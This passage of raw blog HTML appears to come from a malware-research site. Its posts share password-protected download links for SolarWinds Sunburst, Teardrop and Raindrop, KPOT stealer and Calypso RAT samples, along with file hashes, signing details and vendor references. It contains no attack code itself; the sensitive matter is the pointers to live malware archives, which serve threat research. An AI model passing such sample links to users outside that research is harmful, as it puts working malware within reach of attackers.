margin-left: 1em; text-decoration-line: none;"></a><div><span style="font-family: verdana;"><a href="https://s3.amazonaws.com/contagio.deependresearch.org/APT/Russia/Solarwinds_Solaburst_Nobelium_samples.zip" target="_blank"><span style="font-family: verdana;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9fekBavhMnuxb9txFvxkWzKz4DZBXwlXNpsm2_s6FKlTJngInQG_9h4amviU59zeRl61NodBmrkvhq-mtc9FDyOUGO8ZaBK-QZFXtHsqFqL0su0Z6rt5Hqpp8WElMdztahWYVyZ2dfdE/s1600/rednag.png" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 1px solid rgb(255, 255, 255); box-shadow: rgba(0, 0, 0, 0) 1px 1px 5px; padding: 0px; position: relative;" /></span></a><a href="http://contagio.deependresearch.org/APT/Russia/Solarwinds_Solaburst_Nobelium_samples.zip">Download (627.7 MB)</a>. Email me if you need the password (see in my profile)<br /> </span></div><div> <a href="https://airtable.com/shr2iB6e8g1DLJKWH" style="color: #660000; font-family: verdana; text-decoration-line: none;" target="_blank">Malware Inventory (work in progress)</a></div><span><a name='more'></a></span><div><br /></div></div></div><div dir="ltr" trbidi="on"><div style="background-color: #618f2b; line-height: 19px; text-align: center;"><div style="margin: 0px;"><span style="color: white;"><span style="font-family: verdana;"><b>Reference</b></span></span></div></div><span style="font-family: verdana;"><span></span><br /></span><div dir="ltr" trbidi="on"><span style="font-family: verdana;">I am sure you all saw the news. </span></div><div dir="ltr" trbidi="on"><span style="font-family: verdana;"><br /></span></div><div dir="ltr" trbidi="on"><span style="font-family: verdana;"></span></div><div dir="ltr" style="text-align: left;" trbidi="on"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJHESQjb4GvEj6AjI4HC55tTnkwYW-_B-GCO9NpivJXIy79pDY_Fy6PvojJ1RFbVvANLrfaeCT6ABzXwqiD7l3WzX77v0AoI4-qStU8dxA98XDYPZvzj3xYsVoz8VlP65hIlJbeNGwRCIQ5ohW8D5Gpb1X-NvDixJ9b6TQwbdhGXsSyQ69SA4aRZIQ/s43/ba.png" style="clear: left; font-family: Times; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="43" data-original-width="43" height="43" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJHESQjb4GvEj6AjI4HC55tTnkwYW-_B-GCO9NpivJXIy79pDY_Fy6PvojJ1RFbVvANLrfaeCT6ABzXwqiD7l3WzX77v0AoI4-qStU8dxA98XDYPZvzj3xYsVoz8VlP65hIlJbeNGwRCIQ5ohW8D5Gpb1X-NvDixJ9b6TQwbdhGXsSyQ69SA4aRZIQ/s1600/ba.png" width="43" /></a><span style="font-family: verdana;">Links updated: Jan 19, 2023</span></div><div dir="ltr" trbidi="on"><span style="font-family: verdana;"><div dir="ltr" trbidi="on"><a href="https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html"></a></div><div dir="ltr" trbidi="on"><br /></div><div dir="ltr" trbidi="on"><br /></div><div><a href="https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/">2020-12-13 Microsoft</a></div><div><a href="https://s3.amazonaws.com/contagio.deependresearch.org/read/APT_2020_Customer+Guidance+on+Recent+Nation-State+Cyber+Attacks+%E2%80%93+Microsoft+Security+Response+Center.pdf">Customer Guidance on Recent Nation-State Cyber Attacks</a></div></span></div><div dir="ltr" trbidi="on"><br /></div><div dir="ltr" trbidi="on"><br class="Apple-interchange-newline" /><span style="color: #0000ee; font-family: verdana; text-decoration-line: underline;">The Resurgence of Russian Threat Actor, NOBELIUM</span></div><div dir="ltr" trbidi="on"><span style="color: #0000ee; font-family: verdana; text-decoration-line: underline;"><br /></span></div><div dir="ltr" trbidi="on"><span style="font-family: verdana;"> </span></div><div dir="ltr" trbidi="on"></div><span style="font-family: verdana;"></span><div dir="ltr" trbidi="on"><span style="font-family: verdana;">Well, here are the Sunburst binaries. </span></div><div dir="ltr" trbidi="on"><span style="font-family: verdana;">Here is a Sunburst malware analysis walk-through video by </span><span style="font-family: verdana;">Colin Hardy</span></div><div dir="ltr" trbidi="on"><span style="font-family: verdana;"><a href="https://www.youtube.com/watch?v=JoMwrkijTZ8&feature=youtu.be">https://www.youtube.com/watch?v=JoMwrkijTZ8&feature=youtu.be</a></span></div><span></span><div dir="ltr" trbidi="on"><br /></div></div><div dir="ltr" trbidi="on"><div style="line-height: 19.6px;"><div style="line-height: 19px;"><div><span style="font-family: verdana;"><br class="Apple-interchange-newline" /><br /><br /><a href="https://www.blogger.com/null" name="more"></a></span></div><div><div style="background-color: #618f2b; color: white; line-height: 19px; text-align: center;"><b><span style="font-family: verdana;">Hashes</span></b></div><div><span style="font-family: courier;"><br /></span></div><div><div><span style="font-family: verdana;"><b><br /></b></span></div><div><span style="font-family: verdana;"><b><br /></b></span></div><div><span style="font-family: verdana;"><b><br /></b></span></div><div><span style="font-family: verdana;"><b><br /></b></span></div><div><span style="font-family: verdana;"><b><br /></b></span></div><div><span style="font-family: verdana;"><b>SolarWinds.Orion.Core.BusinessLayer.dll<br /><br /></b></span></div><div><span style="font-family: courier;"><br /></span></div><div><span style="font-family: courier;"> </span><span style="font-family: courier;">Trojan:MSIL/Solorigate.B!dha</span></div></div><div><span style="font-family: courier;">A Variant Of MSIL/SunBurst.A</span></div></div><div><span style="font-family: courier;"><b><br /></b></span></div><div><div><span style="font-family: courier;"><b>SolarWinds.Orion.Core.BusinessLayer.dll</b></span></div><div><span style="font-family: courier;">32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77</span></div><div><span style="font-family: courier;">dab758bf98d9b36fa057a66cd0284737abf89857b73ca89280267ee7caf62f3b</span></div><div><span style="font-family: courier;">eb6fab5a2964c5817fb239a7a5079cabca0a00464fb3e07155f28b0a57a2c0ed</span></div><div><span style="font-family: courier;">c09040d35630d75dfef0f804f320f8b3d16a481071076918e9b236a321c1ea77</span></div><div><span style="font-family: courier;">ac1b2b89e60707a20e9eb1ca480bc3410ead40643b386d624c5d21b47c02917c</span></div><div><span style="font-family: courier;">019085a76ba7126fff22770d71bd901c325fc68ac55aa743327984e89f4b0134</span></div><div><span style="font-family: courier;">ce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6</span></div><div><span style="font-family: courier;">a25cadd48d70f6ea0c4a241d99c5241269e6faccb4054e62d16784640f8e53bc</span></div><div><span style="font-family: courier;">d3c6785e18fba3749fb785bc313cf8346182f532c59172b69adfb31b96a5d0af</span></div><div><span style="font-family: courier;">0f5d7e6dfdd62c83eb096ba193b5ae394001bac036745495674156ead6557589</span></div><div><span style="font-family: courier;">6e4050c6a2d2e5e49606d96dd2922da480f2e0c70082cc7e54449a7dc0d20f8d</span></div><div><span style="font-family: courier;"><b><br /></b></span></div><div><span style="font-family: courier;"><b>CORE-2019.4.5220.20574-SolarWinds-Core-v2019.4.5220-Hotfix5.msp</b></span></div><div><span style="font-family: courier;">d0d626deb3f9484e649294a8dfa814c5568f846d5aa02d4cdad5d041a29d5600</span></div><div><span style="font-family: courier;"><br /></span></div><div><span style="font-family: courier;"><b>appweblogoimagehandler.ashx.b6031896.dll</b></span></div><div><span style="font-family: courier;">c15abaf51e78ca56c0376522d699c978217bf041a3bd3c71d09193efa5717c71</span></div></div><div><span style="font-family: courier;"><br /></span></div><div><span style="font-family: courier;"><b>TEARDROP</b></span></div><div><span style="font-family: courier;"><div>b820e8a2057112d0ed73bd7995201dbed79a79e13c79d4bdad81a22f12387e07</div><div>1817a5bf9c01035bcf8a975c9f1d94b0ce7f6a200339485d8f93859f8f6d730c</div></span></div><div><span style="font-family: courier;"><br /></span></div><div><span style="font-family: courier;"><b>RAINDROP</b></span></div><div><span style="font-family: courier;">be9dbbec6937dfe0a652c0603d4972ba354e83c06b8397d6555fd1847da36725</span></div><div><span style="font-family: courier;"><b><br /></b></span></div><div><span style="font-family: courier;"><b>This is the compromised installer file ( was </b></span><b style="font-family: courier;">still</b><b style="font-family: courier;"> on Solarwinds update downloads on Dec 14, 2020)</b></div><div><b style="font-family: courier;"><br /></b></div><div><span style="font-family: courier;"><b>File size<span style="white-space: pre;"> </span>419.76 MB</b></span></div><div><span style="font-family: courier;"><b>CoreInstaller.msi</b></span></div><div><span style="font-family: courier;"><b><br /></b></span></div><div><span style="font-family: courier;">ad2fbf4add71f61173975989d1a18395afb8538ed889012b9d2e21c19e98bbd1</span></div><div><span style="font-family: courier;"><br /></span></div><div><span style="font-family: courier;">2020-04-21 17:31:02</span></div><div><span style="font-family: courier;">SolarWinds Orion Core Services 2020.2</span></div><div><span style="font-family: courier;">{77E2D294-3D5C-4D93-ADF1-884CCEAD93B0}</span></div><div><span style="font-family: courier;">File Version Information</span></div><div><div><span style="font-family: courier;">Date signed<span style="white-space: pre;"> </span>05:32 PM 04/21/2020</span></div><div><span style="font-family: courier;">Signers</span></div><div><span style="font-family: courier;">Solarwinds Worldwide, LLC</span></div><div><span style="font-family: courier;">Symantec Class 3 SHA256 Code Signing CA</span></div><div><span style="font-family: courier;">VeriSign</span></div></div><div><span style="font-family: courier;">VT - 0 (Dec 14, 2020)</span></div><div><span style="font-family: courier;"><br /></span></div><div><span style="font-family: courier;">If you unzip, check </span></div><div><span style="font-family: courier;"><a href="https://www.virustotal.com/gui/file/019085a76ba7126fff22770d71bd901c325fc68ac55aa743327984e89f4b0134/detection">019085a76ba7126fff22770d71bd901c325fc68ac55aa743327984e89f4b0134 </a> (36 detections , part of the IOC set)</span></div><div><span style="font-family: courier;"><br /></span></div><div><span style="font-family: courier;">SolarWinds.Orion.Core.BusinessLayer.dll under OrionCore</span></div><div><span style="font-family: courier;"><br /></span></div><div><span style="font-family: courier;"><br /></span></div><div><span style="font-family: courier;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5_S5gbd9GNbnVFpk85-XVTYknvlj3jMMM6sHpuo1U2AVg9LRV2igq_R2Gk3YcCXbHRpZlurASD6dNN_id_TwJMKqkgKqxMFsc9xMBF6Geor5sYke9BUWJXErL5PgARl6tpLqQs3ObRkk/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="1086" data-original-width="1128" height="452" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5_S5gbd9GNbnVFpk85-XVTYknvlj3jMMM6sHpuo1U2AVg9LRV2igq_R2Gk3YcCXbHRpZlurASD6dNN_id_TwJMKqkgKqxMFsc9xMBF6Geor5sYke9BUWJXErL5PgARl6tpLqQs3ObRkk/w469-h452/image.png" width="469" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: left;"><br /></div><br /><br /></span></div></div></div></div>Milahttp://www.blogger.com/profile/09472209631979859691noreply@blogger.com1tag:blogger.com,1999:blog-7885177434994542510.post-24260137198753201672020-04-19T11:27:00.007-04:002023-01-21T01:03:27.783-05:00KPOT info stealer samples<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: left;">
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><div class="separator" style="clear: both; text-align: left;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdcVERXFy92RGYiB-Q2j1vyjawTevh-V6tLY0mWxb6VBfeLC_z0pS2UcbJR5cFJMytVH5BDe8Vne7XvyRePo-zyG09YidshHQfCKLu4UerIaC3T4KsAjXBjjCx-QllEHE8Ss0OXSvGmDQ2b33RTbKtLRzVKpWLIgox0xEtkqKrIlBlcvGup61m1YkD/s636/image%20(1).png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="636" data-original-width="629" height="220" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdcVERXFy92RGYiB-Q2j1vyjawTevh-V6tLY0mWxb6VBfeLC_z0pS2UcbJR5cFJMytVH5BDe8Vne7XvyRePo-zyG09YidshHQfCKLu4UerIaC3T4KsAjXBjjCx-QllEHE8Ss0OXSvGmDQ2b33RTbKtLRzVKpWLIgox0xEtkqKrIlBlcvGup61m1YkD/w217-h220/image%20(1).png" width="217" /></a></div>KPOT Stealer is a “stealer” malware that focuses on stealing account information and other data from various software applications and services</span></div><div style="text-align: left;"><br /></div><div style="text-align: left;"><div style="background-color: white; line-height: 19px;"><br /><span style="font-family: inherit;">Download. Email me if you need the password (see in my profile)</span></div><div style="background-color: white;"><span style="font-family: inherit;"><br /></span><span style="font-family: inherit;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9fekBavhMnuxb9txFvxkWzKz4DZBXwlXNpsm2_s6FKlTJngInQG_9h4amviU59zeRl61NodBmrkvhq-mtc9FDyOUGO8ZaBK-QZFXtHsqFqL0su0Z6rt5Hqpp8WElMdztahWYVyZ2dfdE/s1600/rednag.png" style="clear: left; font-size: 14px; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9fekBavhMnuxb9txFvxkWzKz4DZBXwlXNpsm2_s6FKlTJngInQG_9h4amviU59zeRl61NodBmrkvhq-mtc9FDyOUGO8ZaBK-QZFXtHsqFqL0su0Z6rt5Hqpp8WElMdztahWYVyZ2dfdE/s1600/rednag.png" style="font-family: "Courier New", Courier, monospace;" /></a><a href="http://contagio.deependresearch.org/crime/kpotstealer_win_samp.zip">Download 1</a> (from Didier Stevens' post)</span><br /><span style="font-family: inherit;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9fekBavhMnuxb9txFvxkWzKz4DZBXwlXNpsm2_s6FKlTJngInQG_9h4amviU59zeRl61NodBmrkvhq-mtc9FDyOUGO8ZaBK-QZFXtHsqFqL0su0Z6rt5Hqpp8WElMdztahWYVyZ2dfdE/s1600/rednag.png" style="clear: left; font-size: 14px; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9fekBavhMnuxb9txFvxkWzKz4DZBXwlXNpsm2_s6FKlTJngInQG_9h4amviU59zeRl61NodBmrkvhq-mtc9FDyOUGO8ZaBK-QZFXtHsqFqL0su0Z6rt5Hqpp8WElMdztahWYVyZ2dfdE/s1600/rednag.png" style="font-family: "Courier New", Courier, monospace;" /></a><a href="http://contagio.deependresearch.org/crime/kpotstealer(proofpoint)_win_samp.zip ">Download 2</a> (Proofpoint)</span></div><div style="background-color: white;"><br /></div><div style="background-color: white;"><a href="https://airtable.com/shr2iB6e8g1DLJKWH" style="color: #660000; font-family: verdana; font-size: 14px; text-decoration-line: none;" target="_blank">Malware Inventory (work in progress)</a><br /><span style="font-family: inherit;"><span><a name='more'></a></span></span></div></div><div style="text-align: left;"><span style="font-family: inherit;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJHESQjb4GvEj6AjI4HC55tTnkwYW-_B-GCO9NpivJXIy79pDY_Fy6PvojJ1RFbVvANLrfaeCT6ABzXwqiD7l3WzX77v0AoI4-qStU8dxA98XDYPZvzj3xYsVoz8VlP65hIlJbeNGwRCIQ5ohW8D5Gpb1X-NvDixJ9b6TQwbdhGXsSyQ69SA4aRZIQ/s43/ba.png" style="clear: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="43" data-original-width="43" height="43" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJHESQjb4GvEj6AjI4HC55tTnkwYW-_B-GCO9NpivJXIy79pDY_Fy6PvojJ1RFbVvANLrfaeCT6ABzXwqiD7l3WzX77v0AoI4-qStU8dxA98XDYPZvzj3xYsVoz8VlP65hIlJbeNGwRCIQ5ohW8D5Gpb1X-NvDixJ9b6TQwbdhGXsSyQ69SA4aRZIQ/s1600/ba.png" width="43" /></a><span style="font-family: verdana;">Links updated: Jan 19, 2023</span></span></div><div style="text-align: left;"><span style="font-family: inherit;"><span style="font-family: verdana;"><br /></span></span></div>
<div style="text-align: left;" trbidi="on">
<div style="background-color: #618f2b; line-height: 19px; text-align: center;">
<div style="margin: 0px;">
<span style="color: white;"><span style="font-family: inherit;"><b>References</b></span></span></div>
</div>
<div style="text-align: left;">
<span style="font-family: inherit;"><span style="font-family: inherit;"></span><br /></span></div>
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="text-align: left;" trbidi="on">
<div style="text-align: left;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjD_Wqm82cnGvBVk1RzT4wJ22MAHyQLK6AJt4hvPUaD5iMQTXN3iE1WMKir7WapLmCks7mhRODkUi7bmAeHkXqQcKqikx0pfGGTiElz0XnevFejvXwZJLu2HmsTNcqK2La2K6wq0AKbhCg/s1600/download.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="191" data-original-width="263" height="239" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjD_Wqm82cnGvBVk1RzT4wJ22MAHyQLK6AJt4hvPUaD5iMQTXN3iE1WMKir7WapLmCks7mhRODkUi7bmAeHkXqQcKqikx0pfGGTiElz0XnevFejvXwZJLu2HmsTNcqK2La2K6wq0AKbhCg/w330-h239/download.png" width="330" /></a></div>
<span style="font-family: inherit;">1. <span style="background-color: white; color: #222222;">2020-04-19 </span>Didier Stevens posted analysis of KPOT infostealer on the Infosec Handlers Diary blog <a href="https://isc.sans.edu/diary/KPOT+Analysis%3A+Obtaining+the+Decrypted+KPOT+EXE/26014">"KPOT Analysis: Obtaining the Decrypted KPOT EXE</a>"</span></div>
<div style="text-align: left;">
<span style="font-family: inherit;">These are samples to follow his analysis routine.</span></div>
<span style="font-family: inherit;"><br /></span><span style="font-family: inherit;">2. 2019-05-09 <a href="https://www.proofpoint.com/us/threat-insight/post/new-kpot-v20-stealer-brings-zero-persistence-and-memory-features-silently-steal">Proofpoint. New KPOT v2.0 stealer brings zero persistence and in-memory features to silently steal credentials</a></span></div><div style="text-align: left;" trbidi="on"><br /></div><div style="text-align: left;" trbidi="on"><br /></div><div style="text-align: left;" trbidi="on"><br /></div><div style="text-align: left;" trbidi="on"><br /></div><div style="text-align: left;" trbidi="on"><br /></div>
<div style="text-align: left;" trbidi="on">
<div style="text-align: center;">
<span style="font-family: inherit;"><br /></span></div>
<div style="text-align: center;">
<span style="font-family: inherit;"><br /></span></div>
</div>
<div style="text-align: left;" trbidi="on">
<div style="background-color: #618f2b; color: white; line-height: 19px; text-align: center;">
<b><span style="font-family: inherit;">Download</span></b></div>
<div style="line-height: 19.6px;">
<div style="line-height: 19px;">
<div style="background-color: white; text-align: left;">
<span style="font-family: inherit;"><br /></span></div>
<div style="background-color: white; line-height: 19px; text-align: left;">
<div>
<span style="font-family: inherit;"> <a href="https://airtable.com/shr2iB6e8g1DLJKWH" style="color: #660000;">Other malware</a> - Airtable</span></div>
<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9fekBavhMnuxb9txFvxkWzKz4DZBXwlXNpsm2_s6FKlTJngInQG_9h4amviU59zeRl61NodBmrkvhq-mtc9FDyOUGO8ZaBK-QZFXtHsqFqL0su0Z6rt5Hqpp8WElMdztahWYVyZ2dfdE/s1600/rednag.png" style="clear: left; color: #660000; float: left; margin-bottom: 1em; margin-left: 1em;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9fekBavhMnuxb9txFvxkWzKz4DZBXwlXNpsm2_s6FKlTJngInQG_9h4amviU59zeRl61NodBmrkvhq-mtc9FDyOUGO8ZaBK-QZFXtHsqFqL0su0Z6rt5Hqpp8WElMdztahWYVyZ2dfdE/s1600/rednag.png" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 1px solid rgb(255, 255, 255); box-shadow: rgba(0, 0, 0, 0) 1px 1px 5px; padding: 0px; position: relative;" /></span></a><span style="font-family: inherit;"><br /></span><br />
<span style="font-family: inherit;">Download. Email me if you need the password (see in my profile)</span></div>
<div style="background-color: white; text-align: left;">
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">1. <a href="http://contagio.deependresearch.org/crime/kpotstealer_win_samp.zip">http://contagio.deependresearch.org/crime/kpotstealer_win_samp.zip</a> from Didier Stevens' post</span><br />
<span style="font-family: inherit;">2. <a href="http://contagio.deependresearch.org/crime/kpotstealer(proofpoint)_win_samp.zip">http://contagio.deependresearch.org/crime/kpotstealer(proofpoint)_win_samp.zip</a> - Proofpoint</span></div>
<div style="background-color: white; font-size: 14px;">
<span style="font-family: inherit;"><br /></span></div>
<div style="background-color: white; font-size: 14px;">
<span style="font-family: inherit;"><span style="font-family: inherit;"></span><br /></span>
<br />
<div style="text-align: center;">
<span style="font-family: inherit;"><br /></span></div>
<span style="font-family: inherit;"><a href="https://www.blogger.com/null" name="more" style="color: #660000;"></a></span></div>
<div style="background-color: white;">
<div style="background-color: #618f2b; color: white; font-size: 14px; line-height: 19px; text-align: center;">
<b><span style="font-family: inherit;">Hashes</span></b></div>
<div style="text-align: left;">
<b><span style="font-family: inherit;"><br /></span></b></div>
<div style="text-align: left;">
<span style="font-family: inherit;">1. From Didier Stevens' post</span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">MD5<span style="white-space: pre;"> </span> 56ad7b243511ee7398d43df7643dc904</span><br />
<span style="font-family: inherit;">SHA-1<span style="white-space: pre;"> </span> ae5ab7798ca267b1265a0496c562f219821d17cf</span><br />
<span style="font-family: inherit;">SHA-256</span><span style="font-family: inherit; white-space: pre;"> </span><span style="font-family: inherit;"> 3fd4aa339bdfee23684ff495d884aa842165e61af85fd09411abfd64b9780146</span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">2. From Proofpoint</span><br />
<br />
MD5<span style="white-space: pre;"> </span>7d7667ddce8fd69a0fd50bb08c287d10<br />
SHA-1<span style="white-space: pre;"> </span>087fc3e9a082983ee6a2b25f0ccb09eb723e0f39<br />
<span style="font-family: inherit;"></span><br />
SHA-256<span style="white-space: pre;"> </span>67f8302a2fd28d15f62d6d20d748bfe350334e5353cbdef112bd1f8231b5599d<br />
<br />
MD5<span style="white-space: pre;"> </span>45ddc687f88b45fc3fec79f9dc8b38e2<br />
SHA-1<span style="white-space: pre;"> </span>de37b748e0e32d96c31f469f9ba4ea4f11e3e78b<br />
SHA-256<span style="white-space: pre;"> </span>36dcd40aee6a42b8733ec3390501502824f570a23640c2c78a788805164f77cecontagio.deependresearch.org/crime/kpotstealer(proofpoint)_win_samp.zip</div>
</div>
</div>
</div>
</div>
</div>
Milahttp://www.blogger.com/profile/09472209631979859691noreply@blogger.com0tag:blogger.com,1999:blog-7885177434994542510.post-78539133490032525552019-12-01T23:46:00.007-05:002023-01-21T01:03:43.355-05:00APT Calypso RAT, Flying Dutchman Samples<div dir="ltr" style="text-align: left;" trbidi="on">
<br /><div trbidi="on"><span style="font-family: inherit;"><br /></span></div>
<div trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-C9ha7omcT4TQ5QGihYs6whJ0kdQZgjAOb9yufMKOeRUpkL7ZSid4rLpvaU6bIX4opkc5SLqCSLXOa4zeWq89mW2dcT8aESDjOjv5aCtyhsJ5dDm6Iy4alzUHAHulHFP5sPg06AdsmaZ5v1NP4G9BWTaRTNtp6bq0hBU3eEXb5OoXv-iwc08kbvuD/s519/image%20(2).png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="511" data-original-width="519" height="222" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-C9ha7omcT4TQ5QGihYs6whJ0kdQZgjAOb9yufMKOeRUpkL7ZSid4rLpvaU6bIX4opkc5SLqCSLXOa4zeWq89mW2dcT8aESDjOjv5aCtyhsJ5dDm6Iy4alzUHAHulHFP5sPg06AdsmaZ5v1NP4G9BWTaRTNtp6bq0hBU3eEXb5OoXv-iwc08kbvuD/w226-h222/image%20(2).png" width="226" /></a></div>
<a href="http://contagio.deependresearch.org/read/APT-2019_calypso-apt-2019-eng.pdf" style="color: #660000; text-decoration-line: none;">2019-10-31 Calypso APT: new group attacking state institutions</a></div><div trbidi="on"><br /></div>
<div trbidi="on">
<div style="text-align: left;"><span style="font-family: inherit;">Attackers exploit Windows SMB vulnerability </span>CVE-2017-0143 or use stolen credentials to gain access, deploy the custom Calypso RAT and use it to upload other tools such as Mimikatz, EternalBlue and EternalRomance. They move laterally and steal data.</div>
<div style="text-align: left;">
<div style="background-color: white; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: 14px; line-height: 19px;"><div><span style="font-family: inherit;"> </span></div></div><div style="background-color: white; font-family: "Trebuchet MS", Trebuchet, sans-serif;"><span style="font-family: inherit;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9fekBavhMnuxb9txFvxkWzKz4DZBXwlXNpsm2_s6FKlTJngInQG_9h4amviU59zeRl61NodBmrkvhq-mtc9FDyOUGO8ZaBK-QZFXtHsqFqL0su0Z6rt5Hqpp8WElMdztahWYVyZ2dfdE/s1600/rednag.png" style="background-color: transparent; clear: left; color: #660000; font-size: 14px; margin-bottom: 1em; margin-right: 1em; text-decoration-line: none;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9fekBavhMnuxb9txFvxkWzKz4DZBXwlXNpsm2_s6FKlTJngInQG_9h4amviU59zeRl61NodBmrkvhq-mtc9FDyOUGO8ZaBK-QZFXtHsqFqL0su0Z6rt5Hqpp8WElMdztahWYVyZ2dfdE/s1600/rednag.png" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 1px solid rgb(255, 255, 255); box-shadow: rgba(0, 0, 0, 0) 1px 1px 5px; padding: 0px; position: relative;" /></a><a href="http://contagio.deependresearch.org/APT/China/CalypsoAPT_win_samp.zip" style="color: #660000; text-decoration-line: none;">Download. Email me if you need the password (see in my profile)</a></span></div>
<br /></div>
<div style="text-align: center;"> <a href="https://airtable.com/shr2iB6e8g1DLJKWH" style="color: #660000; font-family: verdana; text-align: left; text-decoration-line: none;" target="_blank">Malware Inventory (work in progress)</a></div><div style="text-align: center;"><br /></div><span><a name='more'></a></span><div style="text-align: left;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJHESQjb4GvEj6AjI4HC55tTnkwYW-_B-GCO9NpivJXIy79pDY_Fy6PvojJ1RFbVvANLrfaeCT6ABzXwqiD7l3WzX77v0AoI4-qStU8dxA98XDYPZvzj3xYsVoz8VlP65hIlJbeNGwRCIQ5ohW8D5Gpb1X-NvDixJ9b6TQwbdhGXsSyQ69SA4aRZIQ/s43/ba.png" style="clear: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="43" data-original-width="43" height="43" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJHESQjb4GvEj6AjI4HC55tTnkwYW-_B-GCO9NpivJXIy79pDY_Fy6PvojJ1RFbVvANLrfaeCT6ABzXwqiD7l3WzX77v0AoI4-qStU8dxA98XDYPZvzj3xYsVoz8VlP65hIlJbeNGwRCIQ5ohW8D5Gpb1X-NvDixJ9b6TQwbdhGXsSyQ69SA4aRZIQ/s1600/ba.png" width="43" /></a><span style="font-family: verdana;">Links updated: Jan 19, 2023</span></div>
<div style="text-align: center;">
<br /></div>
</div>
<div dir="ltr" trbidi="on">
<div style="background-color: #618f2b; color: white; line-height: 19px; text-align: center;">
<b>Download</b></div>
<div style="line-height: 19.6px;">
<div style="line-height: 19px;">
<div style="background-color: white; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: 14px;">
<span style="font-family: inherit;"><br /></span></div>
<div style="background-color: white; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: 14px; line-height: 19px;">
<div>
<span style="font-family: inherit;"> <a href="https://airtable.com/shr2iB6e8g1DLJKWH" style="color: #660000; text-decoration-line: none;">Other malware</a></span></div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9fekBavhMnuxb9txFvxkWzKz4DZBXwlXNpsm2_s6FKlTJngInQG_9h4amviU59zeRl61NodBmrkvhq-mtc9FDyOUGO8ZaBK-QZFXtHsqFqL0su0Z6rt5Hqpp8WElMdztahWYVyZ2dfdE/s1600/rednag.png" style="clear: left; color: #660000; float: left; margin-bottom: 1em; margin-right: 1em; text-decoration-line: none;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9fekBavhMnuxb9txFvxkWzKz4DZBXwlXNpsm2_s6FKlTJngInQG_9h4amviU59zeRl61NodBmrkvhq-mtc9FDyOUGO8ZaBK-QZFXtHsqFqL0su0Z6rt5Hqpp8WElMdztahWYVyZ2dfdE/s1600/rednag.png" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 1px solid rgb(255, 255, 255); box-shadow: rgba(0, 0, 0, 0) 1px 1px 5px; padding: 0px; position: relative;" /></a><span style="font-family: inherit;"><br /></span></div>
<div style="background-color: white; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: 14px;">
